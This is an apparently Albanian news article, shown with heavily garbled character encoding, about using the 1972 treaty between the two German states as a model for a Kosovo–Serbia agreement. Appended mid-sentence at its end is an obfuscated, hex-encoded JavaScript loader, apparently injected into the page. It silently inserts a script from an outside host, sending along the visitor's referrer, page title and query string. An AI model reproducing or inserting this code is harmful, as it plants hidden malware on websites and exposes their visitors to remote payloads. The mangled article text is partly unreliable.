f.1107095044958_m

Dy GjermanitA� nA�nshkruan traktatin si shtete

Po tA� zbatohej nA� tA�rA�si modeli i dy shteteve gjermane, Serbia do tA� duhej ta njihte sovranitetin territorial tA� KosovA�s, tA� njoh legjitimitetin e saj ndA�rkombA�tarA� dhe tA� zotohet se kufijtA�, pavarA�sia autonomia janA� tA� paprekshme.

Kosova dhe Serbia pos qA� do tA� nA�nshkruanin traktat si dy shtete, do tA� ishin anA�tare tA� OKB-sA� dhe do tA� zotoheshin se do tA� zbatojnA� kriteret e KartA�s sA� OKB-sA�. Kjo A�shtA� pA�rafA�rsisht edhe pA�rmbajtja e traktatit bazik tA� dy shteteve gjermane, mA� 1972.

PA�rfaqA�sues tA� instituteve kA�rkimore nA� KosovA�, vlerA�sojnA� se modeli do tA� ishte zgjidhe e mirA� e pA�rkohshme pA�r raportet mes KosovA�s dhe SerbisA�, shkruan a�?Koha Ditorea�?.

E shkatA�rruar nga Lufta e DytA� BotA�rore Gjermania do tA� administrohej nA� pesA� zona tA� ndryshme nga aleatA�t perA�ndimorA�, fitues tA� luftA�s. NjA� zonA� nA� lindje do tA� lihej nA�n administrimin edhe tA� Bashkimit Sovjetik, si njA�ri nga aleatA�t. MA� 1949 zonat e administruara nga aleatA�t perA�ndimorA� do tA� bA�heshin Republika Federale e GjermanisA�. GjashtA� vjet mA� vonA�, edhe zona nA�n administrimin e Bashkimit Sovjetik do tA� shpallej e pavarur si Republika Demokratike e GjermanisA�. Veprimi do tA� A�onte nA� disa vjet luftA� diplomatike. Ato do tA� arrinin paqen vetA�m nA� vitin 1972, kur Republika Federale e GjermanisA� (PerA�ndimore v.j) do tA� hiqte dorA� nga lufta diplomatike kundA�r RepublikA�s nA� GjermaninA� Lindore.

Tash dyzet vjet pas, Traktati bazA� i nA�nshkruar mes dy shteteve gjermane nA� Bon, mA� 21 dhjetor tA� vitit 1972, A�shtA� vetA�m njA� dokument historik pa kurrfarA� efekti. MegjithatA�, ai mund tA� shA�rbejA� si bazA� pA�r njA� marrA�veshje tA� mundshme mes KosovA�s sA� deklaruar shtet i pavarur, mA� 2008, dhe SerbisA�.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}